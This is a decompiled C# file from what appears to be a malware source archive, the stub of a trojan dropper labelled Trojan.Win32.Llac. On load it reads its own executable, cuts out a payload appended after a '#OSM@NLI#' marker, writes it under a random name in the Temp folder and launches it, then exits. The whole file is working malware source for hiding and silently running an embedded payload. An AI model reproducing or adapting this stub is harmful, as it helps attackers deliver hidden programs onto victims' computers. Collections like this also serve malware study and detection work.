MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.zss-301942dcda2295c2c5d6b5f4d6027abd4bbcbde982ae01c3413c146b29bf2726/Module1.cs
2022-08-18 06:28:56 -05:00

78 lines
2.5 KiB
C#
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: Osmanlı_Stub.Module1
// Assembly: Osmanlı Stub, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: D861F35C-B25E-47D0-AB37-24B6B26AD263
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.zss-301942dcda2295c2c5d6b5f4d6027abd4bbcbde982ae01c3413c146b29bf2726.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Osmanlı_Stub.My;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace Osmanlı_Stub
{
[DesignerGenerated]
public class Module1 : Form
{
private IContainer components;
private string Dosya;
private string Hedef;
public Module1()
{
this.Load += new EventHandler(this.Module1_Load);
this.Hedef = MyProject.Computer.FileSystem.SpecialDirectories.Temp + "\\oTToMaN." + Path.GetRandomFileName().Replace(".", "") + ".$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$";
this.InitializeComponent();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(284, 262);
this.Name = nameof (Module1);
this.Text = "Form1";
this.ResumeLayout(false);
}
public void Main()
{
FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read);
this.Dosya = Strings.Space(checked ((int) FileSystem.LOF(1)));
FileSystem.FileGet(1, ref this.Dosya);
FileSystem.FileClose(1);
this.Dosya = this.Dosya.Substring(this.Dosya.LastIndexOf("#OSM@NLI#")).Replace("#OSM@NLI#", "");
this.Dosya = this.Dosya.Replace("\0" + Conversions.ToString(Strings.Chr((int) byte.MaxValue)), "\0");
FileSystem.FileOpen(2, this.Hedef, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Shared);
FileSystem.FilePut(2, this.Dosya, -1L, false);
FileSystem.FileClose(2);
Interaction.Shell(this.Hedef, AppWinStyle.NormalFocus);
ProjectData.EndApp();
}
private void Module1_Load(object sender, EventArgs e) => this.Main();
}
}